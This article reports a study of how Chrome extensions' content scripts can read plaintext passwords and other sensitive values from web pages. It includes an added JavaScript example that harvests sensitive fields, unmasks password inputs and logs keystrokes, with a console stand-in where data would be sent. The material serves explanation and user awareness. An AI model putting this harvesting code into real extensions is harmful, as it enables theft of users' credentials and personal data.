Researchers at the University of Wisconsin-Madison recently reported a weakness in how Google Chrome separates web pages from browser extensions, one that puts millions of users at risk.
An extension that has been granted access to a page can read passwords and other sensitive values that sit as plaintext in that page’s HTML and DOM.
The problem is not malware in the usual sense. It is the combination of quiet data exfiltration tooling with a gap in Chrome’s extension security model.
On many websites the password a user types is present as plaintext in the page: the dots shown on screen are only how the browser renders an input field of type password, while the field’s actual value can be read by any script that has access to the page’s DOM. Some sites go further and place sensitive values directly in their HTML source. On a site built this way, anyone who can read the page’s contents can collect all of it.
The second half of the problem is on Chrome’s side: the browser, not the website, decides what an extension may access, and an extension’s content scripts run with full read access to every page they are injected into. A website cannot restrict that access, so an extension with broad host permissions effectively receives whatever the page holds.
Put together, this lets a malicious extension use vulnerable websites to collect the site’s data along with the user’s own highly sensitive information. As the report states: “The extensions can still access entire contents of the web pages, including text input fields where users may enter sensitive information such as passwords, Social Security Numbers (SSN), and credit card information.”
According to the report, over 17,000 popular Chrome extensions hold the permissions that would allow this kind of data extraction, and 11% of the top 10,000 websites are susceptible to it.
To show how serious the risk is, the researchers built their own Chrome extension. It captured the HTML source of each site a user logged into, stripped the masking from password fields, and monitored what the user typed. It contained no malware in the conventional sense, yet it exfiltrated data effectively.
The extension even passed muster under Manifest V3, Chrome’s newer extension platform, for a time. Manifest V3 tightens what code an extension may load and how it runs in the background, but it does not restrict what a content script can read from a page’s DOM, so it leaves this gap open.
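To make the mechanism described above concrete, here is an added example (not the researchers’ proof-of-concept or any code from the report) of the three things a content script can do once Chrome has injected it into a page: read the plaintext value behind a masked password field, flip the field so the browser renders that value, and watch every keystroke. The field-name patterns, the fake login page and the `makeFakeLoginPage` helper are constructed here so the logic can be exercised offline in Node; in a real extension the same functions would be handed `document`.

```javascript
// Added example, not the paper's artifact. Shows why an extension content
// script can read "masked" passwords: the masking of <input type="password">
// is only a rendering; the element's .value holds the plaintext for any
// script that shares the page DOM.

// Standard HTML autocomplete tokens that mark a field as sensitive.
// The name pattern below is our own heuristic, not from the report.
const SENSITIVE_AUTOCOMPLETE = new Set([
  'current-password', 'new-password', 'cc-number', 'cc-csc', 'one-time-code',
]);
const SENSITIVE_NAME_PATTERN = /pass|ssn|social|card|cvv|cvc/i;

// Classify one <input>-like element. Works on real DOM elements and on the
// plain objects used by the offline fake page below.
function classifyField(el) {
  const type = (el.type || 'text').toLowerCase();
  const autocomplete = (el.autocomplete || '').toLowerCase();
  const name = `${el.name || ''} ${el.id || ''}`;
  if (type === 'password') return 'password';
  if (SENSITIVE_AUTOCOMPLETE.has(autocomplete) || SENSITIVE_NAME_PATTERN.test(name)) {
    return 'sensitive';
  }
  return null;
}

// Reading the page: walk every input in the DOM and take its plaintext value.
// `root` is anything with querySelectorAll (a Document, or a test double).
function harvestFields(root) {
  const out = [];
  for (const el of root.querySelectorAll('input')) {
    const kind = classifyField(el);
    if (kind) out.push({ kind, name: el.name || el.id || '', value: el.value });
  }
  return out;
}

// "Removing password obfuscation" is a one-line DOM write: changing the type
// makes the browser display the plaintext that was in .value all along.
// Returns how many fields were changed.
function unmaskPasswords(root) {
  let changed = 0;
  for (const el of root.querySelectorAll('input[type="password"]')) {
    el.type = 'text';
    changed++;
  }
  return changed;
}

// Monitoring input: a capture-phase 'input' listener on the document sees
// every keystroke before the page's own handlers run, and the page cannot
// stop it. `sink` is wherever the data would be sent.
function watchInput(root, sink) {
  root.addEventListener('input', (ev) => {
    const kind = classifyField(ev.target);
    if (kind) sink({ kind, name: ev.target.name || ev.target.id || '', value: ev.target.value });
  }, true);
}

// Only wires itself up when loaded as a real content script; in Node there
// is no document, so the functions above can be exercised on a fake page.
if (typeof document !== 'undefined') {
  watchInput(document, (rec) => console.log('[demo] would exfiltrate:', rec));
}

// Constructed stand-in for a login page (sample data, not a real site).
function makeFakeLoginPage() {
  const fields = [
    { type: 'text', name: 'user', autocomplete: 'username', value: 'alice' },
    { type: 'password', name: 'pwd', autocomplete: 'current-password', value: 'hunter2' },
    { type: 'text', name: 'ssn', value: '123-45-6789' },
    { type: 'text', name: 'remember', value: 'on' },
  ];
  return {
    querySelectorAll(selector) {
      if (selector === 'input') return fields;
      if (selector === 'input[type="password"]') return fields.filter((f) => f.type === 'password');
      return [];
    },
  };
}
```

Nothing here needs a special API: a Manifest V3 manifest only has to declare a `content_scripts` entry whose `matches` covers the target sites for Chrome to inject a script like this, and Manifest V3 places no limit on what that script reads from the DOM. That is the gap the article refers to; the only defense on the user’s side is not having such an extension installed.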
The researchers recommend changing passwords regularly and being very careful about which extensions you install; in practice that means keeping the number of installed extensions small and checking what site access each one requests. Large-scale data breaches continue to grow in number, and third-party software can hide malicious code or steal your data.